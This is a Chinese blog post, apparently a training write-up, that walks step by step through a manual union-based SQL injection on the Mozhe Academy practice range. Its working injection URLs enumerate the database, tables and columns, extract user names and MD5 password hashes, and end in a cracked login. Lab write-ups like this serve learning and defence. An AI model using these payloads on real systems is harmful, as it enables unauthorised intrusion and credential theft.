1.1SQL注入(手动)实战过程

SQL注入-联合查询注入手打墨者学院入门靶场

1.进入网站查看网站特征:
在这里插入图片描述
发现界面存在两个输入框,尝试万能密码能够直接突破:
在这里插入图片描述尝试发现登录失败
在这里插入图片描述查看页面是否原样输出(/判断尝试xss),发现输入数据未原样输出;无法禅师xss注入:
在这里插入图片描述在这里插入图片描述
发现页面存在其他链接,点击查看:
在这里插入图片描述在这里插入图片描述发现该页面url携带参数http://www.***.com/new_list.php?id=1可能存在sql注入,单引号井号判断类型:

http://www.***.com/new_list.php?id=1'

发现页面发生变化,初步判断存在sql注入,下面通过and 1=1/or 1判断注入为整形注入还是字符型注入

http://www.***.com/new_list.php?id=1 and 1=1	//真

在这里插入图片描述

http://www.***.com/new_list.php?id=1 and 1=2		//假

在这里插入图片描述
确定数据类型为整形(也叫数字型),尝试union联合查询注入语句order by判断字段总数量,发现字段总数量为4:

http://www.***.com/new_list.php?id=1 and 1=2 order by 4

在这里插入图片描述使用union语句判断显示位(也叫暴露点)

http://www.***.com/new_list.php?id=1 and 1=2 union select 1,2,3,4

在这里插入图片描述
判断结果发现显示位为2,使用mysql语句替换显示位内容,报出数据库敏感信息:
数据库名:

http://www.***.com/new_list.php?id=1 and 1=2 union select 1,database(),3,4

在这里插入图片描述
发现数据库名为:mozhe_Discuz_StormGroup
记录下数据库名称后,查看数据库中所有table_Name(表名)

http://www.***.com/new_list.php?id=1 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() limit 0,1

在这里插入图片描述
数据库存放两个表,表名分别为:StormGroup_member、notice
得到表名后,已知数据库名、表名,应查看表中的相应数据:

http://www.***.com/new_list.php?id=1 and 1=2 union select 1,(select column_name from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member' limit 0,1),3,4

在这里插入图片描述
得到一字段为id,同理:其他字段分别为name、password、status
在这里插入图片描述在这里插入图片描述在这里插入图片描述通过数据库名、表名、字段名查询指定数据:

密码:356f589a7df439f6f744ff19bb8092c0	//MD5加密
http://www.***.com/new_list.php?id=1 and 1=2 union select 1,(select password from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1),3,4	

在这里插入图片描述

用户名:***
http://www.***.com/new_list.php?id=1 and 1=2 union select 1,(select name from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1),3,4

在这里插入图片描述尝试使用注入获取的用户名密码登录却登录失败,分析原因,懵逼中。。。。。
尝试查询其他字段数据发现:

status(limit 0,1):0		//代表第一列无数据;看来得用第二行数据登录
http://www.***.com/new_list.php?id=1 and 1=2 union select 1,(select status from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1),3,4

在这里插入图片描述
随后采用以上方法重新查询limit1,1数据,查询得name为:***/password为:3e9ac74458daffd8a13f17805677eb18(md5解密)
在这里插入图片描述在这里插入图片描述使用md5解密所得password字符串
在这里插入图片描述尝试登录,登录成功!
在这里插入图片描述
在这里插入图片描述
舒服了。。。。。。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值